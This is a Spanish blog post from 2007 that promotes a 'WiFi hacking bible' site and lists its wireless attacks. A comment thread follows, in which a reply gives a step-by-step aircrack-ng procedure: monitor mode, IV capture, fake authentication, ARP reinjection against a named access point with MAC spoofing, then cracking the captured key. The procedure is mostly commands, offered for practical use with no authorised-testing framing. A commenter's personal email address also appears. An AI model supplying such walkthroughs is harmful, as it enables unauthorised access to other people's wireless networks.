La biblia del hacking Wifi
12 02 2007Aqui os dejo el enlace a la biblia del hacking Wifi http://hwagm.elhacker.net/. La Web se la han currado de lo lindo poniendo ejemplos que son muy fáciles de seguir. Como vereis hablan de temas como: ¿cuantos tipo de inyección conocidas existen en linux?, ataque 0: desautentificación de clientes, ataque 1: falsa autentificación, ataque 2: Reenvío interactivo de paquetes, ataque 3: Reinyección de trafico, ataque 4: El “chopchop” de KoreK (predicción de CRC), desautentificación de clientes, reinyección de trafico en windows, inyectando trafico con CommView 5.2, recordatorio de los “Alias”, ¿como efectuar un Ataque 0 o desautentificación de clientes?, obtención del handshake sobre encriptación WPA-PSK, descubrir el ESSID oculto de una conexión wireless, conseguir una falsa autentificación en windows para redes wireless sin clientes, reinyección de trafico en windows, etc.etc.etc
hola,
me podrias dar algunas intrucciones para usar el wifislax 2.0 con los programas wireless?
cualquier aporte me sirve
gracias
fernandez.18@gmail.com
Matias, una de los programas que te permite de una forma sencilla escanear redes, capturar tráfico e inyectarlo es airoscript, que lo tienes en una de las opciones. Desde ahí, se te abrirá un menú en modo texto donde vas paso a paso. Verás que incluso está en castellano. Lo que hace airoscript es facilitarte el tener que lanzar comandos tipo:
airmon-ng.sh (se utiliza para poner la tarjeta en modo monitor)
Ej: airmon-ng start ath0
airodump-ng (se utiliza para capturar tráfico en un fichero)
Ej: airodump-ng –ivs –channel 5 -w fichero ath0
(Si quieres capturar de todos los canales eliminar la opción –channel)
aireplay-ng (se utiliza para inyectar tráfico y poder agilizar así la captura de paquetes con airodump-ng)
Ej: (Primero: asociar un cliente. Por ejemplo el 00:11:22:33:44:55)
aireplay-ng -1 60 -a 00:18:9B:05:19:08 -h 00:11:22:33:44:55 -e THOMSON ath0
(Segundo: inyectar tráfico con ese cliente. Conviene cambiar la mac de tu tarjeta wireless a 00:11:22:33:44:55)
aireplay-ng -3 -b 00:18:9B:05:19:08 -h 00:11:22:33:44:55 -e THOMSON ath0
(Tercero: esperar a que en la ventana de airodump crezca el numero de paquetes a, por lo menos, un millon, pero esto depende de lo compleja que sea la clave)
(Cuarto: con el fichero de captura pasar el aircrack)
Ej: aircrack-ng fichero*.ivs
Estos últimos comandos que te he puesto es para hacerlo manualmente desde un terminal, por eso te comentaba lo del airoscript, ya que este te hace más o menos estos pasos.
Si tienes alguna duda, ya sabes!!
Saludos!